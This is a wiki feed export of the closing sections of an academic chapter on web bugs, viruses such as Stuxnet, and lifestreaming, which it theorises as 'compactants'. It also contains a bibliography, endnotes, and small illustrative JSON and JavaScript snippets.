Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
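&lt;br /&gt;
In the JSON serialisation of the specification (ActivityStreamsWG, 2011), such a story becomes a small, machine-readable object. The following is a hand-written illustration in the spirit of the spec's own examples – the names, identifiers and URLs are invented: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;{ &lt;br /&gt;
  &amp;quot;published&amp;quot;: &amp;quot;2012-03-02T10:15:00Z&amp;quot;, &lt;br /&gt;
  &amp;quot;actor&amp;quot;: { &amp;quot;objectType&amp;quot;: &amp;quot;person&amp;quot;, &amp;quot;id&amp;quot;: &amp;quot;acct:geraldine@example.org&amp;quot;, &amp;quot;displayName&amp;quot;: &amp;quot;Geraldine&amp;quot; }, &lt;br /&gt;
  &amp;quot;verb&amp;quot;: &amp;quot;post&amp;quot;, &lt;br /&gt;
  &amp;quot;object&amp;quot;: { &amp;quot;objectType&amp;quot;: &amp;quot;photo&amp;quot;, &amp;quot;url&amp;quot;: &amp;quot;http://example.org/photos/123&amp;quot; }, &lt;br /&gt;
  &amp;quot;target&amp;quot;: { &amp;quot;objectType&amp;quot;: &amp;quot;photo-album&amp;quot;, &amp;quot;displayName&amp;quot;: &amp;quot;Geraldine's holiday album&amp;quot; } &lt;br /&gt;
}&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Once an activity is expressed in this way it can be stored, aggregated and queried like any other structured record, which is precisely what makes the lifestream computationally tractable. &lt;br /&gt;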
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case – in other words, for the individual user (or lifestreamer) and for the organization (such as Facebook) – the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
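&lt;br /&gt;
One of the simplest forms such comparison takes is normalising an individual's data-points against a group baseline, for instance as a z-score; the sketch below uses invented numbers purely for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;// Minimal sketch: compare one user's reading to a group norm. &lt;br /&gt;
function mean(xs) { return xs.reduce(function(a, b) { return a + b; }, 0) / xs.length; } &lt;br /&gt;
function stddev(xs) { &lt;br /&gt;
  var m = mean(xs); &lt;br /&gt;
  return Math.sqrt(mean(xs.map(function(x) { return (x - m) * (x - m); }))); &lt;br /&gt;
} &lt;br /&gt;
// Invented data: a population baseline and one lifestreamer's day. &lt;br /&gt;
var population = [4200, 5100, 4800, 6000, 5300]; // daily step counts &lt;br /&gt;
var todaysSteps = 7400; &lt;br /&gt;
var z = (todaysSteps - mean(population)) / stddev(population); &lt;br /&gt;
// z expresses how far today deviates from the norm - the kind of &lt;br /&gt;
// signal fed back to the user as a nudge, badge or warning.&amp;lt;/pre&amp;gt; &lt;br /&gt;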
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narrative, a stabilising web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software, and the implications for the wider research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now lifestreaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions. Yet users are actively downloading apps that advertise the fact that they collect this data, and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are lifestreams – albeit lifestreams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want particularly to draw attention to this passive-aggressive feature of computational agents that collect information: passive in the sense of lying under the surface, relatively benign and silent; aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology from the Latin ''compact'', for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Many viruses, for example, seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems, made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the ‘future self’ will be required to undo bad habits and behaviours of the present self. That is, there is an explicit normative orientation towards a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard: what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The Cyber-Road Not Taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm is able to transfer itself without requiring any human action. It does this by exploiting a computer's file- or information-transport features, such as its networking facilities, which allow it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm, together with careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, Ralph Langner then matched this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and enrichment process through careful analysis of background images accidentally photographed on computers used by the president; see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code, released in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, however, some criticisms that this link may be spurious. For instance, Cryptome (2010) argues that it may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants: I draw the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4699</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4699"/>
		<updated>2012-04-18T13:44:47Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
